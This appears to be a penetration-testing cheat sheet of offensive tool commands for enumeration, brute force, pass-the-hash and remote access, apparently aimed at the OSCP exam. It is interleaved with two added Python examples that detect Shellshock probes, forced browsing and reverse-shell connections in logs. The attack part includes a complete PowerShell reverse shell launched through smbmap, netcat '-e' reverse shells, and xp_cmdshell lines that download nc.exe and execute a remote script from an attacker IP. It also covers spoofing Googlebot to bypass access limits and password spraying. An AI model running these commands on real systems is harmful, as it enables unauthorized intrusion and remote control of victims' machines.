WPSCAN (WORDPRESS)

… simple scanner for Word Press sites

wpscan --url http://10.10.1.299 --passwords /usr/share/wordlists/rockyou.txt --usernames admin

BURPSUITE

… greatest webs tool ever
… recommend downloading latest community edition here
… simply install with the bash script that was downloaded

cd ~/Downloads
sudo bash ./burpsuite_install.sh

WHATWEB

… simply identifies websites

whatweb website.com

GOOGLE BOT

…sometimes sites won’t allow public searches
…so change into a google bot
…use burpsuite to change your agent

# NEWER AGENT HEADER TO USE
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
# OLD AGENT HEADER SOMETIMES WORKS
Googlebot/2.1 (+http://www.google.com/bot.html)
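The curl section's `() { :; };` User-Agent header, the dirb/gobuster/nikto wordlist scans and the Googlebot agent trick above all leave distinctive traces in a web server's access log. Added here as an example (not code from the page): a Python analyzer over combined-format access-log lines that reports a Shellshock-shaped header value, a source producing a burst of 404s (forced browsing), and any client that merely claims to be Googlebot, which should be confirmed by reverse DNS rather than trusted from the string. The log lines, the 404 threshold and the finding names are my own constructions.

```python
import re
from collections import Counter

# Apache/nginx "combined" log line:
#   ip ident user [ts] "method path proto" status size "referer" "user-agent"
COMBINED_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A bash function definition at the start of a header value: the Shellshock shape "() {".
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")
NOT_FOUND_THRESHOLD = 20  # 404s from one source before it is reported as forced browsing (assumed)


def build_sample_log():
    """Constructed access log: one wordlist scan, one Shellshock probe, one
    self-declared Googlebot, and ordinary traffic (none of it real)."""
    ua = "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
    lines, second = [], 0
    for name in ("admin", "backup", "config", "old", "test", "dev", "uploads", "private"):
        for ext in ("", ".php", ".html"):
            lines.append(f'10.10.1.50 - - [26/Apr/2022:17:23:{second:02d} +0000] '
                         f'"GET /{name}{ext} HTTP/1.1" 404 196 "-" "{ua}"')
            second += 1
    lines += [
        f'10.10.1.50 - - [26/Apr/2022:17:24:00 +0000] "GET /index.php HTTP/1.1" 200 3200 "-" "{ua}"',
        '10.10.1.77 - - [26/Apr/2022:17:30:00 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 512 "-" '
        '"() { :; }; echo vulnerable"',
        '10.10.1.88 - - [26/Apr/2022:17:31:00 +0000] "GET /members/ HTTP/1.1" 200 1800 "-" '
        '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
        f'192.168.1.10 - - [26/Apr/2022:17:32:00 +0000] "GET /about.html HTTP/1.1" 200 900 '
        f'"http://website.com/" "{ua}"',
        f'192.168.1.10 - - [26/Apr/2022:17:32:05 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "{ua}"',
    ]
    return "\n".join(lines) + "\n"


def parse_access_log(text):
    """Return one dict per line that matches the combined format; others are skipped."""
    return [m.groupdict() for m in map(COMBINED_LOG_RE.match, text.splitlines()) if m]


def analyze_access_log(text):
    """Return (ip, finding, detail) triples for every source worth a closer look."""
    entries = parse_access_log(text)
    findings = []
    for ip, n in Counter(e["ip"] for e in entries if e["status"] == "404").items():
        if n >= NOT_FOUND_THRESHOLD:
            findings.append((ip, "forced_browsing", f"{n} responses with status 404"))
    for e in entries:
        if SHELLSHOCK_RE.search(e["ua"]):
            findings.append((e["ip"], "shellshock_probe", f'{e["method"]} {e["path"]} UA={e["ua"]!r}'))
        if "Googlebot" in e["ua"]:
            findings.append((e["ip"], "claims_googlebot",
                             "confirm with reverse DNS (googlebot.com) before trusting the agent string"))
    return findings


if __name__ == "__main__":
    for ip, kind, detail in analyze_access_log(build_sample_log()):
        print(f"{ip:14} {kind:18} {detail}")
```

The Shellshock check looks at the User-Agent only because that is what the combined format records; the same header shape arrives in Cookie, Referer or any other header a CGI handler exports into the environment, so a mod_security-style rule or full request logging is needed to cover those.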

DIG

… domain information groper – DNS queries

dig website.com
# ONLY A RECORDS
+short
# REMOVE COMMENT LINES
+nocomments
# QUERY ALL DNS TYPES / RECORDS
dig website.com ANY
# TRACE DNS PATHS
+trace
# ASK A SPECIFIC NAME SERVER
@8.8.8.8

SNMP
PORT UDP 161

… discovers network management information about a system

# SNMPWALK
snmpwalk -c public -v1 -t 10 10.10.1.299
# SNMP-CHECK
snmp-check -c public -v 1 10.10.1.299

SHOWMOUNT (NFS)

… grab information about Network File Shares

showmount -a 10.10.1.299
# DIRECTORIES ONLY
showmount -d 10.10.1.299
# SHOW EXPORTED FILE SYSTEMS
showmount -e 10.10.1.299

RPCINFO (RPC)

… makes a call to the server and reports findings

rpcinfo 10.10.1.299
rpcinfo -s
rpcinfo -p

EXAMPLE BASH SCRIPTS

… use these to create your own

# TRY POP3 LOGINS (PORT 110) FOR SEVERAL USERS
for user in user1 user2 user3 user4; do ( echo USER ${user}; sleep 2s; echo PASS abcd; sleep 2s; echo LIST; sleep 2s; echo quit) | nc -nvC 10.10.1.299 110; done
# TACKING ON COMMANDS WITH WEB SHELL PAGE (USE '&' CHARACTER)
10.10.1.229 & powershell -NoP -NonI -W Hidden -Exec Bypass......

EXPLORE FILES RECURSIVELY

… you can download an entire directory
… you can further grep recursively

# SAVES DIRECTORY AS THE IP... THEN GREP THAT DIRECTORY
wget -r ftp://user:[email protected]
grep -r '=sa' 10.10.1.229

NMAP SCRIPTING ENGINE (NSE)

… the scripting engine will automatically look for vulnerabilities
… similar to metasploit, but able to be used on OSCP exam

nmap --script-help "define search"
--script nbstat.nse ip
--script smb-os-discovery ip
--script smb-enum-shares -p 139,445 ip
--script=smb-os-discovery
--script smb-vuln*
--script ms-sql*
--script ldap-rootdse
--script ldap-search

IMPACKET

… there are several modules for Impacket… all useful!
… here’s a list of what’s installed by default on Kali:
impacket-addcomputer
impacket-GetNPUsers
impacket-mimikatz
impacket-ping6
impacket-samrdump
impacket-split
impacket-atexec
impacket-getPac
impacket-mqtt_check
impacket-psexec
impacket-secretsdump
impacket-ticketConverter
impacket-dcomexec
impacket-getST
impacket-mssqlclient
impacket-raiseChild
impacket-services
impacket-ticketer
impacket-dpapi
impacket-getTGT
impacket-mssqlinstance
impacket-rdp_check
impacket-smbclient
impacket-wmiexec
impacket-esentutl
impacket-GetUserSPNs
impacket-netview
impacket-reg
impacket-smbexec
impacket-wmipersist
impacket-exchanger
impacket-goldenPac
impacket-nmapAnswerMachine
impacket-registry-read
impacket-smbrelayx
impacket-wmiquery
impacket-findDelegation
impacket-karmaSMB
impacket-ntfs-read
impacket-rpcdump
impacket-smbserver
impacket-GetADUsers
impacket-kintercept
impacket-ntlmrelayx
impacket-rpcmap
impacket-sniff
impacket-getArch
impacket-lookupsid
impacket-ping
impacket-sambaPipe
impacket-sniffer

# COMMON ONES USED
# LDAP
impacket-GetNPUsers thinc/10.10.1.299 -dc-ip 10.10.1.299 -request
# RPC
impacket-rpcdump 10.10.1.299
# SMB
impacket-lookupsid 10.10.1.299
# CONNECTIONS TO WINDOWS
sudo impacket-psexec user:password@ip
# CREATE SMB v1 SERVER
impacket-smbserver share smbserver
# CREATE SMB v2 SERVER - DOESN'T ALWAYS WORK (SHARE NAME FIRST, THEN THE FOLDER)
impacket-smbserver -smb2support <sharename> <folder>
# CONNECTION TO SQL
impacket-mssqlclient [email protected]
# FIND SPECIFIC BINARIES
impacket-rpcdump -p 135 10.10.1.229 | grep .exe
# NOTE THAT SOME EXPLOITS REQUIRE PYTHON2
# INSTALL PYTHON2 FIRST... https://www.kali.org/docs/general-use/using-eol-python-versions/
# THEN INSTALL PIP TO THE NEW PYENV
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
sudo python2 get-pip.py
python2 -m pip install impacket

ENUM4LINUX

… enumeration of Windows Samba systems

enum4linux 10.10.1.299
# VERBOSE
enum4linux -v 10.10.1.299
# RUN ALL SCRIPTS
enum4linux -a 10.10.1.299
# USE CREDENTIALS
enum4linux -u user -p password -U 10.10.1.299
# PULL USER NAMES
enum4linux -r 10.10.1.299
# LIST GROUPS
enum4linux -G 10.10.1.299
# LIST SHARES
enum4linux -S 10.10.1.299
# DICTIONARY ATTACK TO LIST SHARES
enum4linux -s shares.txt 10.10.1.299
# ENUMERATE THE OS
enum4linux -o 10.10.1.299
# PRINTER INFORMATION
enum4linux -i 10.10.1.299

SMBMAP
PORT 139
PORT 445

… enumeration of Samba shares

smbmap -H ip/hostname
# USING CREDENTIALS
smbmap -u user -p password -H host
# COMMAND EXECUTION
smbmap -u user -p 'password' -d domain -x 'net group /domain' -H host
# USING HASH
smbmap -u user -p 'hashpart1:hashpart2' -H host
# LIST DIRECTORY CONTENTS
smbmap -u user -p 'password' -r 'C$\Users'
# LIST DRIVES
smbmap -u user -p 'password' -L
# EXECUTE COMMAND FOR SHELL
smbmap -u user -p 'password' -d domain -H host -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.1.299""""; $port=""""80"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'

NBTSCAN

… scans for NetBIOS name information

nbtscan 10.10.1.299
# VERBOSE
-v
# HUMAN READABLE
-vh
# DUMP CONTENTS OF PACKET
-d
# USE FILE FOR MULTIPLE HOSTS
-f addresses.txt

SMTP
PORT 25

… connect and verify accounts
… also remember Shellshock?

nc -C ip 25
VRFY name
EXPN name
# EXAMPLES
VRFY root
EXPN postmaster
EXPN root
# NEVER FORGET ABOUT POSTFIX SHELLSHOCK
python2 postfix-shellshock-nc.py 10.10.1.299 [email protected] 192.168.119.299 443

SSH
PORT 22

… connection protocol common to Linux, used on Windows sometimes

ssh user@ip
# USE A KEY FILE
ssh -i key_file user@ip
# USE SPECIFIC ENCRYPTION
ssh -i key_file -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
# POSSIBLE RESTRICTED BASH ESCAPE
ssh [email protected] -t "bash --noprofile"

SMB TRANSFERS

… use SMB to transfer files to your target
… set up an SMB server with SMB v2

# START SERVER
impacket-smbserver -smb2support share ../FOLDER
# ON TARGET, DOWNLOAD FILES
copy \\ip\share\file

NETCAT (NC)

… connection tool for bind or reverse shells

nc 10.10.1.299 80
# ENUMERATE A PORT
nc -nv 10.10.1.299 80
# ALTERNATE CONNECTION
nc -nvC 10.10.1.299 80
# REVERSE SHELL
nc 192.168.1.299 <port> -e /bin/bash
nc 192.168.1.299 <port> -e cmd.exe
# LISTENER
nc -nvlp 80
# SEND FILE (RECEIVER LISTENS AND WRITES THE FILE)
nc -l 80 > file.txt
# SENDER
nc server.com 80 < file.txt

SOCAT

… extremely capable connection tool
this is a great read about socat

# SAME AS nc 10.10.1.299 80
socat - TCP:10.10.1.299:80
# LISTEN FOR CONNECTION
socat - TCP-LISTEN:80,crlf

SQSH (SQL)
PORT 1433

… interactive database shell
… remote command execution may also work with authentication

sqsh -S 10.10.1.299 -U sa
# REMOTE COMMAND EXECUTION
# RECONFIGURE / GO REQUIRED AFTER EACH TO EXECUTE
1> exec sp_configure 'show advanced options', 1
2> reconfigure
3> go
1> exec sp_configure 'xp_cmdshell', 1
2> reconfigure
3> go
# NOW READY FOR SHELL COMMANDS
1> xp_cmdshell 'whoami'
2> go
1> xp_cmdshell 'PowerShell -ExecutionPolicy Unrestricted -File c:\tmp\shell.ps1'
2> go
# REVERSE SHELL STRATEGY NETCAT
xp_cmdshell 'powershell invoke-webrequest http://192.168.119.299:443/nc.exe -outfile c:\tmp\nc.exe'
xp_cmdshell 'c:\tmp\nc.exe -e C:\Windows\System32\cmd.exe 192.168.119.299 80'
# REVERSE SHELL STRATEGY POWERSHELL (SINGLE QUOTES INSIDE A T-SQL STRING MUST BE DOUBLED)
xp_cmdshell 'powershell IEX(New-Object Net.WebClient).downloadString(''http://192.168.119.299:443/system.ps1'')'
xp_cmdshell 'PowerShell -ExecutionPolicy Unrestricted -File c:\tmp\shell.ps1'

MYSQL
PORT 3306

… interactive database program for mysql

# -p TAKES THE PASSWORD WITH NO SPACE; "-p password" WOULD PROMPT AND TREAT "password" AS THE DATABASE NAME
mysql -u root -ppassword
# CONNECT TO A HOST
mysql -u root -ppassword -h host

FTP
PORT 21

… command line ftp program

ftp 10.10.1.299
# FILEZILLA CREDENTIAL LOCATION
# BASE64 ENCODED CREDS
C:\Program Files (x86)\FileZilla Server\FileZilla Server.xml

PASS THE HASH

… connection tool for kerberos environments

pth-winexe -U WORKGROUP/User%Pass //10.10.1.299 cmd.exe

RPCCLIENT (RPC)

… Remote Procedure Call connection client

rpcclient -U "user" -N 10.10.1.299
# INTERACT WITH THE SERVER
enumdomusers
enumdomgroups
querygroup 0x204
querygroupmem 0x204
queryuser 0x3e8
getdompwinfo
getusrdompwinfo 0x44f
# IT IS POSSIBLE TO PASSWORD SPRAY AS WELL
rpcclient -U "user%password" -c "getusername;quit" 10.10.1.299
# failed login shows NT_STATUS_LOGON_FAILURE
# VIEW THE SYSVOL WITH CREDENTIALS (QUOTE THE UNC PATH SO THE SHELL KEEPS THE BACKSLASHES)
smbclient -U "user%password" '\\domain.com\sysvol'

REMOTE DESKTOP
PORT 3389

… Windows computers desktop environment

rdesktop 10.10.1.299
# USING CREDENTIALS
rdesktop -u user -p password 10.10.1.299
# SET QUALITY LEVEL WITH 16,24,32 (32 IS HIGHEST)
rdesktop -a 16 10.10.1.299
# CONNECT WITHOUT ENCRYPTION
rdesktop -E 10.10.1.299
# CACHE BITMAPS FOR SPEED (FASTER); NOTE CAPITAL -P, LOWERCASE -p IS THE PASSWORD
rdesktop -P 10.10.1.299
# ENABLE COMPRESSION (SAVES ON BANDWIDTH)
rdesktop -z 10.10.1.299
# XFREERDP IS ALSO AVAILABLE
xfreerdp +clipboard /u:<username> /v:<hostname>

EVIL-WINRM

… connection shell for WinRM

evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
# CONNECT TO A HOST
evil-winrm -u <user> -p <pass> -i <host>

PROXYCHAINS

… a great tool for pivoting networks
… controlled through the /etc/proxychains.conf file
… doesn’t work with all layers in the OSI model (like ping)

# PLACE THE COMMAND BEFORE THE TOOL proxychains nmap 10.10.1.229

SMBCLIENT

… similar to an FTP client for file sharing

smbclient -L host
# QUOTE THE UNC PATH SO THE SHELL KEEPS THE BACKSLASHES
smbclient '\\[ip]\[share name]'
smbclient '\\10.10.1.299\wwwroot'
smbclient '\\10.10.1.299\User Share'
# UPLOAD FILE EXAMPLE
smbclient '\\website.com\RedirectedFolders$' -c 'cd user\Downloads ; put test.txt test.txt' -U user

NETSTAT

… gather network statistics
… used to confirm connections (especially in network pivots)

netstat [options]
# LIST ALL PORTS AND CONNECTIONS
netstat -a
# TCP PORTS
netstat -at
# UDP PORTS
netstat -au
# LISTENING PORTS
netstat -l
# LIST STATISTICS
netstat -s
# NETWORK INTERFACE TRANSACTIONS
netstat -i
# LIST LISTENING PROGRAMS
netstat -lp
# LIST CONTINUOUSLY
netstat -ic
# COMMON USE FOR ENUMERATION
netstat -antup
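The `netstat -antup` output the section above uses to confirm connections is also what a responder reads when checking a host for the reverse shells and pivots described throughout this page. Added here as an example (not code from the page): a Python parser for Linux net-tools `netstat -antup` rows that lists services exposed on every interface and any established connection owned by a shell or netcat-like program. The sample output, the interface and program lists are my own constructions.

```python
import re

# One row of Linux net-tools `netstat -antup` output. UDP rows have no State
# column, and the PID/Program field is a bare "-" when the caller lacks permission.
NETSTAT_ROW_RE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<foreign>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?:(?P<pid>\d+)/(?P<prog>.+)|-)\s*$"
)
ALL_INTERFACES = {"0.0.0.0", "::"}
# A shell or netcat holding an established socket is the classic reverse-shell shape
# (list assumed for this example).
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "nc", "ncat", "netcat", "socat"}

# Constructed `netstat -antup` output from a Linux host; nothing here is real.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1021/mysqld
tcp        0      0 10.10.1.229:22          192.168.119.188:51234   ESTABLISHED 4410/sshd: user
tcp        0      0 10.10.1.229:49152       192.168.119.188:443     ESTABLISHED 4522/bash
tcp6       0      0 :::80                   :::*                    LISTEN      -
udp        0      0 0.0.0.0:161             0.0.0.0:*                           900/snmpd
"""


def parse_netstat(text):
    """Return one dict per socket row: proto, local, foreign, state, pid, program, local_host, local_port."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_ROW_RE.match(line.strip())
        if not m:
            continue
        r = m.groupdict()
        host, port = r["local"].rsplit(":", 1)   # rsplit keeps IPv6 addresses like ::1 intact
        r["local_host"], r["local_port"] = host, int(port)
        r["program"] = r["prog"].split()[0].rstrip(":") if r["prog"] else None
        rows.append(r)
    return rows


def exposed_listeners(text):
    """Sockets listening on every interface, as (proto, port, program)."""
    out = []
    for r in parse_netstat(text):
        listening = r["state"] == "LISTEN" or (
            r["proto"].startswith("udp") and r["foreign"].endswith(":*"))
        if listening and r["local_host"] in ALL_INTERFACES:
            out.append((r["proto"], r["local_port"], r["program"]))
    return out


def shell_connections(text):
    """Established connections owned by a shell or netcat-like program, as (local, foreign, program)."""
    return [(r["local"], r["foreign"], r["program"]) for r in parse_netstat(text)
            if r["state"] == "ESTABLISHED" and r["program"] in SHELL_LIKE]


if __name__ == "__main__":
    print("exposed listeners:", exposed_listeners(SAMPLE_NETSTAT))
    print("shell-owned connections:", shell_connections(SAMPLE_NETSTAT))
```

A `None` program on an exposed listener means netstat was run without the rights to read that process (the `-` column), so rerun as root before concluding anything about it.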

TCPDUMP

… use tcpdump to record traffic if able
… this may reveal LDAP or other account data

/usr/sbin/tcpdump -i any -U -w - 'not port 22' > tcpdump.cap
